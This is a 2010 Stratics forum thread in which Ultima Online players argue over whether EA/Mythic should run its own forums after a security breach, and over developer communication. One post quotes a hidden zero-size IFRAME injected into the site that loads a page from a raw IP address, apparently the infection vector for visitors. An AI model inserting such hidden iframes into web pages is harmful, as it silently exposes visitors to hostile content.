1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.
  2. Greetings Guest!!

In order to combat SPAM on the forums, all users are required to have a minimum of 2 posts before they can submit links in any post or thread.

Dismiss Notice

DEVS: The time has come, host a UO forum.

Discussion in 'UHall' started by Vaen Swiftar, May 29, 2010.

1. Vaen Swiftar

Vaen Swiftar Guest

With the lackluster quality the new powers-that-be have handled things, coupled with the breach of security, I think it's time that EA/Mythic truly begin looking into hosting their own forum for Ultima Online.

2. Pedde

Pedde Guest

there used to be official UO forums, but i guess they were too expensive to moderate and maintain.

3. ingsmsico

ingsmsico Visitor

bad idea, EA will probably tie them to UO accounts, which will put our accounts at the behest of a forum moderator. not a good idea.

4. CrazyJoe

CrazyJoe Always Present
    Stratics Veteran Stratics Legend

So, you support pulling the plug on those on life support ?

5. ChReuter

ChReuter Guest

I miss the old MYUO forums myself, but yes they were tied to accounts back then.

6. GarthGrey

GarthGrey Crazed Zealot
    Stratics Veteran Stratics Legend GoT

Didn't we lose the old boards March of 03? I believe we were given cut off dates, and everyone came over to Stratics (and of course you old folk weren't very welcoming to us) to create new accts. BTW, where has Ravenspyre gotten off to? And I remember a poster named Tristan that was very opinionated and didn't make the transition to Stratics.

7. Nosbor

Nosbor Guest

The old UO forums were completely dead back then too.
    Most stratics information is so out of date that it's hard to find what you're looking for, and these constant security breeches make me feel uncomfortable.
    I am in full agreement that either stratics learns how to internet security or OSI pulls the plug and UO forums go back to uo.com.
    I do support the forum posts being tied to the account though, much like WoW, and a few games before that have done.
    They need to do something though...from what I read the other day they got all the iframes...but this has cropped up today:
    "<DIV class=smallfont>Journeyman<IFRAME src="http://65.111.174.78/files/articles/News/wow.htm" width=0 height=0></IFRAME></DIV>"
    Until this gets prevented, my visits to this site, which used to be daily...will be far less frequent.

8. IanJames

IanJames Certifiable
    Stratics Veteran Alumni

I can't say anything official, only that it's being worked on.

I will say that it is unfair for you to say that most of Stratics is out of date. Petra has been spearheading the other volunteers to get all of the UO information updated. If you haven't looked recently, maybe you should. If something is still out of date, I'd suggest that you PM Petra about it so she can make sure to have someone look at it and get the info updated.

Also, Stratics is just a fan site, we are not in anyway affiliated with EA. They have chosen to use our site for interaction because we seem to have the most users on our forums.

I feel your pain regarding the iframes, hopefully it will be corrected soon.

9. IanJames

IanJames Certifiable
    Stratics Veteran Alumni

10. Babble

Babble Guest

I rather trust the fanbase than EA ....
    Stratics might not always know what they do, but they do something at least.
    :p

11. Evlar

Evlar Guest

Stratics does a pretty good job IMHO...

...I guess that the phrase "don't shoot the messanger" comes in handy when flak like this comes flying ;)

12. Martyna Zmuir

Martyna Zmuir Crazed Zealot

UO is the only EA Mythic MMO without its own forums or "somewhat active" website.

The disaster that is WAR gets far more love than UO gets, and we share community reps...

This is all part of the Dev Team's continuing severe inability to communicate on a meanigful level with their p(l)ayers.

13. Llewen

Llewen Grand Inquisitor
    Professional Stratics Veteran Stratics Legend Campaign Supporter

Maybe I'm easy to please but I've never seen a UO dev team which communicates so well with it's clients. In fact I'm not sure I've ever seen any MMO dev team which so actively engages it's client base.

We get a nice fat substantial letter from the producer every month. The devs actively post to threads started by players, and it is very clear that they are keeping a very close eye on the forums. And I know that more than one of us has received direct pm's from the devs about specific issues.

This dev team deserves a pat on the back when it comes to communication with it's client base.

14. Llewen

Llewen Grand Inquisitor

And I think we should also cut Stratics' staff some slack here. The net can be a dangerous place to operate in, and this could happen to anybody. I know there are some people who had their computers infected as a result of this, but I'm afraid these days we all need to take some responsibility for our own security, and the damage done was avoidable.

As has been noted before, the mods here are human, they are volunteers, and they have had a pretty wretched week.

15. Mapper

Mapper Crazed Zealot
    Stratics Veteran Alumni Stratics Legend

This is very one sided, As of course I'm staff here for Stratics but:

Any EA Forum, Personally, Would be badly run, They can't even have patch or publish notes out on time, let alone run and moderate a forum.

Stratics has plenty of reporters and moderators that know a lot about the sections they run and I think we do a reasonable job, certainly when its all volunteer work.

16. Phaen Grey

Phaen Grey Lore Master
    Stratics Veteran

It amuses me how often people cry and whine about something they get for free...

If EA puts up UO Forums are you willing to pay the hike in subscription fees so they can pay the administrators and moderators?

Stratics has served the UO Community for over a decade; because some random person gets his panties in a bunch and attacks the site doesn't mean they are failing at what they are doing mostly on a voluntary basis.

Patience is a Virtue

17. Martyna Zmuir

Martyna Zmuir Crazed Zealot

What game are you playing? The communication from the Dev Team has been abysmal, and compared to other MMOs, completely lacking. Several years ago, we had Draconi and others posting several times a day. Now, we are lucky for once or twice a week.

A few of the team responds in threads, much of the time with insubstantial fluff that really has zero to do with UO - or the issue vying for attention. However, sometimes an issue is addressed – these are the interactions which need to be increased.

The Ask the Devs Forum hasn’t been used in weeks and quite frankly has been full of fail since the start. They’ve mainly answered fluff questions, said they didn’t know (How could they not know something about the game they develop?? That’s..scary..), and very rarely give an in-depth answer.

The producer’s letters, while nice, are nearly 95% spin control – 5% substance. Take the last letter, very little was actually said, and the whole goza issue was glossed over and then passed onto older players to explain rules that nobody knows to newbies.

If you look at other MMOs, their development and community relations teams tend to have an open dialogue with their players. They actively tell them what they are working on and *gasp* ask for input and then *faints* continues the dialogue. Mythic seems to think working behind a cloak of secrecy is the way to go, and it has bit them in the behind several times in the last two weeks.

Other games tend to have a QA team that can reason their way through a patch in a systematic manner, then give it to the players to test for more than a few days (one day on Origin, really??) before shoving it on an unsuspecting public.

18. Lefty

Lefty Lore Keeper
    Stratics Veteran

I was a mod for the old UO forums, known as Whisper. All the mods were part of the volunteer program.

The forums were canceled because of 2 things. The volunteer program was canceled and Stratics still had more traffic.

The old uo forums was not a happy place. The boards were heavily moderated. Even more so than stratics this past week.

19. Llewen

Llewen Grand Inquisitor

Well, I was specifically thinking of other MMO's, none of the other MMO's I have ever played have had the kind of dev interaction going on that I am seeing here. But I have no interest in getting into a heated argument about it.

This is a completely different issue and it is clear that they are having problems with their QA. It seems to me that when there are cutbacks, they are always the first on the chopping block...

20. LordDrago

LordDrago Certifiable
    Stratics Veteran

I think this is how it would play out:

OK Cal, we are creating new EA/Mythic run forums for UO. However, we have to keep costs under control, so please pick three members of your dev team to transfer over to the forum team or to lay off so we can hire more forum team members. Obviously, this means you need to stop even thinking about a "classic" shard. Also, cut your publishes in half, push back the work on anti-cheating development etc. Oh, and since your restructured dev team is going tobe working even harder than ever, we are going to ensure they are not distracted and remove their ability to post on the new forums. That is just wasting what little dev time you now have.

Yeah, EA/Mythic run forums would be awesome.........

21. GarthGrey

GarthGrey Crazed Zealot
    Stratics Veteran Stratics Legend GoT

They outsource almost their entire Customer Service Dept, I think they can manage to drum up a few for a fan site, they don't even have to speak english, just borrow Der Rocks translator someone mentioned in a previous post. :gee:

22. So ... UO needs a Savior ??

23. T'Challa

T'Challa Certifiable
    Stratics Veteran

*waits for Sillyfoot to weigh in*

24. Cloak&Dagger

Cloak&Dagger Guest

I really have to ask.....Do you develop for an mmo?

How many of these "other" mmos have completely new teams/companies in control of their content that has been around for 10 years?

Have you been coding for 10 years? Do you know what has changed in the coding world in that amount of time?

Now those questions aside, Origin is a stress test, Test Center is where the testing takes place....and last I checked the testing was what...a week or more, then 1 day on origin for a stress test (how it ports to a live shard) and then off to all the shards. This is a full Publish run, and a systematic one, a System by the way which is viable, standard, and performing. What you are complaining about is not even presented in your post when it comes to the publishes, no amount of testing will ever find all the possible flaws, even in completely new code.

As for the rest, the mats were not gone over to your fulfillment I assume, but they were handled in a very good way. No decision has been made, we have simply been informed to discuss the matter (of course this is what I gather from the Devtracker and the official UO web site, if I somehow missed the decision then my apologies). What else did you want from the letter this month? If you really know about other mmos you would know that most perform over 90% of their work in veil, in fact they do not ever even tell you it happened. The 10% you are getting, you just assume is everything because they do not tell you. You assume they are telling you what they are working on when really out of 100 projects, they only told you 1 to keep your in happy land. The devs here tell you 10 but only give you detail about 1 or 2 and you are having a fit? What detail do you wish? Detail is not always the best way to present something, more times than not detail ruins the presentation or the desired effect. And lastly, about them not giving in-depth answers. When they did give an answer that was worthy of someone who could understand it, what happens? No one gets it and they have the question asked 1000 times more in a 100 more different ways, simple answers still answer your questions. And for some other questions, the simple answers saves them from "you promised" when they didn't, The fan base here has a history, that history is what put into place many of the EA policies, for example as Lefty pointed out the Volunteer program was canceled, anyone remember why? Oh right, the player base, or fan base, which ever you prefer to use. I agree the ask the dev forum needs a bit more...activity, and better selection of what to answer. But as for how they answer, well, that is fine as how it has been.